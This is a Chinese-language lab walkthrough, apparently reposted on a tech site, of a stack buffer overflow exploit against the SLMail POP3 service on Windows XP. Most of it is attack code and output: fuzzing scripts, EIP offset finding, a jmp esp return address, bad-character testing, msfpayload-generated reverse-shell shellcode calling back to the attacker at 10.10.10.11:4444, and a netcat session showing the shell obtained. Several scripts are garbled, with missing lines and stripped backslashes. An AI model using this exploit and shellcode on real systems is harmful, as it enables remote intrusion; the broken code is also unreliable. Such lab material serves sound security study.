windows缓冲区溢出
准备环境: 攻机:Kali 2.0 靶机:windows xp ,windows2003不能做这个实验,亲测好多次没成功。有兴趣可以试试 软件:SLMail、immunity debugger 、mona.py 需要软件的可以留言。 总体步骤: 1. 测试是否发生缓冲区溢出 2. 找到缓冲区溢出的位置的临界点并验证 3. 查找系统中固定分配的模块中,哪里有jmp esp,为了后面实现跳转 4. 在2找到的位置处写上3处找到的地址,也就是实现由 eip 到 jmp esp 的过程。这个过程设置断点验证是否跳转成功 5. 判断有哪些坏字符,每个服务不一定相同 6. 生成shellcode,并发送。 7. 完成 Step 1. 利用python脚本测试连接windows的POP3开启windows的POP3服务 使用python脚本测试来连接 ?#!/usr/bin/python ?import socket ?s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) ?try: ? print "nSending veil buffer..." ? s.connect(('10.10.10.19',110)) ? data=s.recv(1024) ? print data ? s.send('USER testrn') ? data=s.recv(1024) ? print data ? s.send('PASS testrn') ? data=s.recv(1024) ? print data ? s.close() ? print "nDone!" ?except: ? print "nFailed to connect pop3" 运行结果: root@kal:/test# ./01.py ?Sending veil buffer... ?+OK POP3 server example.com ready <00005.5584281@example.com> ?-ERR unable to lock mailbox Done! 说明连接POP3成功..... Step2. 测试符合是否会发生缓冲区溢出windows端要用immunity debugger打开slmail服务 这时运行下面脚本: #!/usr/bin/python import socket buffer = ["A"] counter = 100 while len(buffer)<=50: buffer.append("A"*counter) counter = counter + 200 for string in buffer: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('10.10.10.19',110)) print "Sending length %s " %(len(string)) s.recv(1024) s.send('USER test'+'rn') s.recv(1024) s.send('PASS '+string+'rn') s.recv(1024) s.send('QUITrn') s.close() 运行情况: 当执行到2700时。发现在也不动了,看一下windows状况,右下角已经出现了pase,已经停止了,在2600个字符发完之后还能发送,但是到了2700发送完之后就连接不上了,说明缓冲区溢出临界点发生在2600-2700之间。 Step3 确定EIP的位置利用metasploit生成唯一字符串,发送: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8D 重启windows的服务,immunity需要重新打开然后attach,让服务运行起来 #!/usr/bin/python import socket buffer="改成上面生成的字符串" s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "nSending veil buffer..." s.connect(('10.10.10.19',110)) data=s.recv(1024) s.send('USER testrn') data=s.recv(1024) s.send('PASS '+buffer+'rn') data=s.recv(1024) s.close() print "nDone!" except: print "nFailed to connect pop3" 运行脚本,观察windows停止时EIP的位置 用metasploit模块求出偏移量: root@kal:/test# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438 [*] Exact match at offset 2606 得知偏移量是2606,说明EIP的位置在第2607-2610处 Step 4 验证EIP位置与ESP存放数据长度重启windows服务,编写下面脚本 #!/usr/bin/python import socket buffer = "A"*2606 + "B"*4 + "C"*900 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: print "nSending veil buffer..." s.connect(('10.10.10.19',110)) data=s.recv(1024) s.send('USER testrn') s.send('PASS '+ buffer + 'rn') data=s.recv(1024) s.close() print "nDone!" except: print "nFailed to connect pop3" 服务再次暂停,这时发现EIP处的位置变成4个C,说明确定EIP的位置是正确的。 查看存放C的个数 可以看到下图,计算大概存放了400多个C,足够存放一个shellcode 理想状况就是,将EIP的内容修改成ESP的地址,ESP如果放置的是shellcode此时就会被执行,但是每次ESP的地址不同,不能直接修改。这时,我们需要利用系统中自带的 jmp esp 帮我们跳转到esp位置,去执行shellcode Step5 查找jmp esp首先将mona模块导入immunity中的Pycommands中 需要选择前4个是false的,最后一个是true的。就只有三四个,但是其中只有slmfc.dll模块中含有 jmp esp root@kal:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb nasm > jmp esp 00000000 FFE4 jmp esp 输入十六进制需要加上 x 。后面就以第一个作为jmp esp 双击查找的第一个 jmp esp,就可以看到地址是 5F4A358F Step 6 测试跳转接着上面的地址设置断点 #!/usr/bin/python import socket buffer = "A"*2606 + "x8fx35x4ax5f" + "C"*900 #倒着输入上面的地址。 s=socket.socket(socket.AF_INET,110)) data=s.recv(1024) s.send('USER testrn') s.send('PASS '+ buffer + 'rn') data=s.recv(1024) s.close() print "nDone!" except: print "nFailed to connect pop3" 启动服务,发送脚本 右下角会显示执行到断点处,停止 就可以看到,已经跳转到esp,里面装的43 也即是C Step 7 判断坏字符重启服务。 import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) badchar=( "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexffx00" ) buffer="A"*2606+"B"*4+badchar try: s.connect(('10.10.10.12',110)) data=s.recv(1024) s.send('USER test'+'rn') data=s.recv(1024) s.send('PASS '+buffer+'rn') s.close() print "nDone" print "nSending veil buffer..." except: print "Fail connect target" 发送脚本,在windows端 通过上图可以看到0x0a的字符缺失,并且之后的字符也有丢失,那么我们改掉0x0a继续发送一遍 这样就找到三个坏字符0x00 0x0D 0x0A Step 8 构造shellcode构造反弹shell root@kal:/usr/share/framework2# ./msfpayload win32_reverse LHOST=10.10.10.11 LPORT=4444 R | ./msfencode -b "x0dx00x0a" [*] Using Msf::Encoder::PexFnstenvMov with final size of 310 bytes "x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x0fx2ax32". "x60x83xebxfcxe2xf4xf3x40xd9x2dxe7xd3xcdx9fxf0x4a". "xb9x0cx2bx0exb9x25x33xa1x4ex65x77x2bxddxebx40x32". "xb9x3fx2fx2bxd9x29x84x1exb9x61xe1x1bxf2xf9xa3xae". "xf2x14x08xebxf8x6dx0exe8xd9x94x34x7ex16x48x7axcf". "xb9x3fx2bx2bxd9x06x84x26x79xebx50x36x33x8bx0cx06". "xb9xe9x63x0ex2ex01xccx1bxe9x04x84x69x02xebx4fx26". "xb9x10x13x87xb9x20x07x74x5axeex41x24xdex30xf0xfc". "x54x33x69x42x01x52x67x5dx41x52x50x7excdxb0x67xe1". "xdfx9cx34x7axcdxb6x50xa3xd7x06x8exc7x3ax62x5ax40". "x30x9fxdfx42xebx69xfax87x65x9fxd9x79x61x33x5cx69". "x61x23x5cxd5xe2x08x05x20x38x6bx69x42x23x3cx69x79". "xbbx81x9ax42xdex99xa5x4ax65x9fxd9x40x22x31x5axd5". "xe2x06x65x4ex54x08x6cx47x58x30x56x03xfexe9xe8x40". "x76xe9xedx1bxf2x93xa5xbfxbbx9dxf1x68x1fx9ex4dx06". "xbfx1ax37x81x99xcbx67x58xccxd3x19xd5x47x48xf0xfc". "x69x37x5dx7bx63x31x65x2bx63x31x5ax7bxcdxb0x67x87". "xebx65xc1x79xcdxb6x65xd5xcdx57xf0xfax5ax87x76xec". "x4bx9fx7ax2excdxb6xf0x5dxcex9fxdfx42xc2xeax0bx75". "x61x9fxd9xd5xe2x60"; 编写脚本: #!/usr/bin/python import socket shellcode="x6ax48x59xd9xeexd9x74x24xf4x5bx81x73x13x0fx2ax32x60x83xebxfcxe2xf4xf3x40xd9x2dxe7xd3xcdx9fxf0x4axb9x0cx2bx0exb9x25x33xa1x4ex65x77x2bxddxebx40x32xb9x3fx2fx2bxd9x29x84x1exb9x61xe1x1bxf2xf9xa3xaexf2x14x08xebxf8x6dx0exe8xd9x94x34x7ex16x48x7axcfxb9x3fx2bx2bxd9x06x84x26x79xebx50x36x33x8bx0cx06xb9xe9x63x0ex2ex01xccx1bxe9x04x84x69x02xebx4fx26xb9x10x13x87xb9x20x07x74x5axeex41x24xdex30xf0xfcx54x33x69x42x01x52x67x5dx41x52x50x7excdxb0x67xe1xdfx9cx34x7axcdxb6x50xa3xd7x06x8exc7x3ax62x5ax40x30x9fxdfx42xebx69xfax87x65x9fxd9x79x61x33x5cx69x61x23x5cxd5xe2x08x05x20x38x6bx69x42x23x3cx69x79xbbx81x9ax42xdex99xa5x4ax65x9fxd9x40x22x31x5axd5xe2x06x65x4ex54x08x6cx47x58x30x56x03xfexe9xe8x40x76xe9xedx1bxf2x93xa5xbfxbbx9dxf1x68x1fx9ex4dx06xbfx1ax37x81x99xcbx67x58xccxd3x19xd5x47x48xf0xfcx69x37x5dx7bx63x31x65x2bx63x31x5ax7bxcdxb0x67x87xebx65xc1x79xcdxb6x65xd5xcdx57xf0xfax5ax87x76xecx4bx9fx7ax2excdxb6xf0x5dxcex9fxdfx42xc2xeax0bx75x61x9fxd9xd5xe2x60" buffer = "A"*2606 + "x8fx35x4ax5f" + "x90"*9 +shellcode s=socket.socket(socket.AF_INET,110)) data=s.recv(1024) s.send('USER testrn') s.send('PASS '+ buffer + 'rn') data=s.recv(1024) s.close() print "nDone!" except: print "nFailed to connect pop3" 上面的x90 代表NOP,不执行,目的是防止后面的shellcode因为其他原因缺失前面几个字节。 打开windows服务,用kali监听4444端口,然后发送脚本,得到一个反弹shell。 root@kal:/test# nc -lvp 4444 listening on [any] 4444 ... ^[[A^[[B10.10.10.19: inverse host lookup failed: Unknown host connect to [10.10.10.11] from (UNKNOWN) [10.10.10.19] 1158 Microsoft Windows XP [?汾 5.1.2600] (C) ??????? 1985-2001 Microsoft Corp. C:Program FilesSLmailSystem> #拿到shell (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- Windows端LDAP客户端部署及配置
- 在Windows 10周年纪念版中显示触摸键盘(TabTip.exe)
- 如何在Windows上的“监视输出文件”模式(tsc -w)中使用Type
- 单击跟踪Windows应用程序
- xaml – 如何将我的视图模型中的富文本(FlowDocument?)绑定
- windows – 负载平衡器背后的算法?
- 禁用Windows Server网络位置
- windows-phone-7 – WIndows Phone 7.1 SDK与Windows Phone
- windows – MySQL:致命错误:无法打开和锁定权限表:表’m
- windows-7 – 如何在Windows 7中模拟触摸事件?